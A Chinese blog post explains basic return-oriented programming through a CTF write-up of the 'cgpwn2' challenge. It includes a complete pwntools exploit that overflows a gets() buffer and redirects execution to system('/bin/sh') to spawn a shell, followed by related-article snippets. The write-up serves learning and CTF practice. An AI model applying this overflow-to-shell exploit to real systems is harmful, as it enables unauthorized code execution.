Basic rop学习

最新推荐文章于 2022-07-22 17:02:37 发布
最新推荐文章于 2022-07-22 17:02:37 发布
阅读量1k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44223141/article/details/111708097
版权

Basic rop学习

基本ROP

主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。

我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。

ROP 攻击一般得满足如下条件:
程序存在溢出,并且可以控制返回地址。
可以找到满足条件的 gadgets 以及相应 gadgets 的地址。

简单例题:cgpwn2

首先,ida反编译main函数
在这里插入图片描述
可以看出,主要函数都在hello函数中,双击打开
在这里插入图片描述
可以看出,主要函数大部分都在后4行
查看源代码
在这里插入图片描述
首先要求我们输入一个名字,这个输入通过fgets函数完成,最多输入32h个字符到name区域

然后提示我们输入一些信息,通过gets函数完成输入,输入到s区域

name和s区域如下图所示
在这里插入图片描述
在这里插入图片描述
name区域是一个34h字符的区域,s区域的起始位置是运行时距离栈帧0x26个
字节的地方,大小不限

我们还可以看到有一个pwn函数
在这里插入图片描述
这个函数是利用系统调用打印"hehehe",存在一个call system

分析:

可以看到在hello函数中有一个部分我们用gets函数向栈的s区域读取了字符串,因此我们可以在使用输入时让输入的字符串覆盖栈上hello函数的返回地址,让程序执行完hello函数之后执行我们设计的部分

exp:

from pwn import *
from sys import *

context.log_level='debug'
context.arch = 'amd64'

p = process('./cgpwn2')

p.recvuntil("please tell me your name")
p.sendline("/bin/sh")

sys_addr=0x0804855a
name_addr=0x0804a080
payload = 'a'*0x26 + 'a'*4 + p32(sys_addr)+p32(name_addr)

p.recvuntil("hello,you can leave some message here:")
p.sendline(payload)

p.interactive()

执行就get shell了:
在这里插入图片描述

I'm five.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
basic rop3-rop
taopaode的博客
03-11 346
pwn——basic rop (ret2system): 老规矩,先checksec一下: 开启了NX,堆栈不可执行,这里提一下,复制文件进虚拟机之后最好改一下权限,命令是: chmod 755 name 放入ida中:发现get()函数,可以溢出 这里与上一道题不同的是NX保护,所以我们无法通过在用户态的栈里写入一些类似system()的命令,所以我们要往内核态的栈里面写,但两个栈内存上是独...
PWN学习笔记(一)Basic Rop
weixin_44120526的博客
12-26 334
学习笔记主要基于CTF WIKI 中的Basic rop部分。 网址为:https://wiki.x10sec.org/pwn/linux/stackoverflow/basic-rop/ -------------------------------------------------------------------- 首先翻译了一下文章的开头,内容为: 打开NX保护后,很难继续直接将代码注入堆栈或堆中。攻击者也提出了相应的绕过保护的方法。目前最主要的是面向返回的程序设计。主要思想是基于堆栈.
pwn——basic rop1
taopaode的博客
03-10 382
pwn——basic rop (ret2text): 老规矩,先checksec一下: 发现开启了NX,堆栈不可执行 放入ida中: 发现存在get函数,可溢出: 查看其他函数,发现在secure中存在完整控制台: 很容易找到system地址: 下面在gdb里面动态调试找到偏移量: 在这里提一下,peda里面的pattern create number命令可以整出一堆完全固定混乱的数字,在输入时...
basic rop-ret2shellcode
taopaode的博客
03-10 251
pwn——basic rop (ret2shellcode): 老规矩,先checksec一下: 发现啥都没开 放入ida中: 查看源代码发现存在get函数,存在溢出 查找控制台,发现没有,当然题目已经告诉没有了,但是在这里我们发现了一个函数strncpy, 它的功能就是将第二个参数里的值按第三个参数大小复制到第一个参数里面,进入buf2里查看,发现buf2在bss段里: 在这里我们通过gdb...
Python之function
LW free space
05-10 1640
在写一个程序的时候,我们不能总是写一些重复的代码,这样看上去很繁琐很冗余。这时候需要借助函数。将功能实现部分写在函数中,需要用的时候,利用函数提供的接口,传递参数进行运算,实现特定功能。 函数定义 最简单的函数如下: #####simplest function##### def print_two(arg1, arg2): print(f"arg1: {arg1}, arg2:...
VB源码(学习VB必须了解的知识)
01-08
在VB(Visual Basic)编程语言的学习中,了解源码是非常重要的一步。源码是程序员编写的、可读的代码,它被编译成计算机可执行的二进制代码。在这个特定的话题中,我们关注的是“ROP码”(Rop Stacks,也称为返回...
VB商品配送中心库存仿真软件设计(源代码+文档).rar
10-25
6. **算法应用**:库存管理涉及多种算法,如Economic Order Quantity (EOQ,经济订货量模型)、Reorder Point (ROP,再订货点模型)等,用于计算最佳订货量和补货时机。VB软件可能集成这些算法,以自动化决策过程。 7...
vb.rar_vb 截图_vba截屏源码_截图_截图 vb
09-24
5. **BitBlt(hdcMem, x, y, cx, cy, hdcSrc, xSrc, ySrc, rop)**:这是一个非常重要的函数,它可以将源设备上下文的一部分复制到目标设备上下文。在这个场景中,它用于从桌面DC复制图像到内存DC。 6. **DeleteDC...
基于VB实现的商品配送中心库存仿真软件设计(源代码+论文).zip
最新发布
05-04
2. **库存管理理论**:包括库存持有成本、缺货成本、订货成本等概念,以及经典的库存控制策略如Economic Order Quantity(EOQ)经济订货量模型,Just-In-Time(JIT)准时制库存管理和Reorder Point(ROP)再订货点...
VB商品配送中心库存仿真软件设计(源代码+论文).zip
05-28
4. **库存控制策略**:软件可能包含多种库存控制策略,如定期订货法(EOQ)、定量订货法(ROP)、连续订货法等。这些策略的实施有助于降低库存成本,减少缺货损失。 5. **用户界面设计**:良好的用户界面可以使操作...
python使用pandas实现数据分割实例代码
12-25
本文研究的主要是Python编程通过pandas将数据分割成时间跨度相等的数据块的相关内容,具体如下。 先上数据,有如下dataframe格式的数据,列名分别为date、ip,我需要统计每5s内出现的ip,以及这些ip出现的频数。 ip date 0 127.0.0.21 15/Jul/2017:18:22:16 1 127.0.0.13 15/Jul/2017:18:22:16 2 127.0.0.11 15/Jul/2017:18:22:17 3 127.0.0.11 15/Jul/2017:18:22:20 4 127.0.0.21 15/Jul/2017:18:22:21 5
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
fypy:用Python3编写的2D线性弹性FEM代码。 使用Numpy,Scipy和Json
02-16
fypy:基于Python3的2D线性弹性有限元代码 依赖项:numpy,numba,scipy,json,timerit和多处理 要测试代码,请执行以下操作: 使用以下命令克隆FyPy:git clone 在FyPy根目录中,键入:“ cd Problems / 2D / 10X10_Traction_Homegeneous /” 键入:python3.8 ../../../main.py data.json.in 使用Sypder或任何支持绘图的IDE在同一目录中运行plot2d.py文件 对于多处理,请执行以下操作: python3.8 ../../../main.py --nprocs = 2 --partype = async
python3.8安装functions模块报错
weixin_40548182的博客
07-22 638
重新编译安装python。
Python个人资料整理
lixiaozhe_csdn的博客
06-22 268
1.基础2.web3.数据分析4.数据结构以及算法5.机器学习
基本ROP
听鬼哥说故事
08-29 8621
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
MySQL学习笔记.查询数据2
Linkage interrupt
10-07 413
目录使用聚合函数查询count函数sum函数AVG函数 使用聚合函数查询 count函数 count函数可以统计数据表中包含的记录行的总数,或者根据查询结果返回列中包含数据行数。 sum函数 求和函数,返回指定列值的总和 AVG函数 ...
roprop2的题目的wp
一个码农的笔记
10-17 4466
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了roprop2这两个题目感觉还不错,我把wp分享出来,方便大家学习 首先先是rop这个题目,下载地址就在https://hackme.inndy.tw/scoreboard/,如果做题的网站关闭或者被墙,就可以从http://download.csdn.net/download/niexinming/100
【Python】function、module、Package及import导入方法
sinat_37967865的博客
03-18 6855
计算机程序开发中,随着程序代码越写越多,在一个文件里代码就会越来越长,越来越不容易维护。 为了编写可维护的代码,我们把很多函数分组,分别放到不同的文件里面,这样,这个文件包含的代码就相对较少,很多编程语言都采用这种组织代码的方式,下面介绍一下Python中的一些基本概念: 基本概念 函数function 将一组代码组织到一起,实现某种功能模块module 为实现某种逻辑将相关连的函数写在同一...
rop轻松谈.pdf
10-21
"ROP轻松谈:深入理解栈溢出与函数调用重定向技术" 在"ROP轻松谈"这份文档中,主要讨论了Return-Oriented Programming(ROP)这一高级漏洞利用技术,特别是在栈溢出(Buffer Overflow)场景中的应用。Rope是针对...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值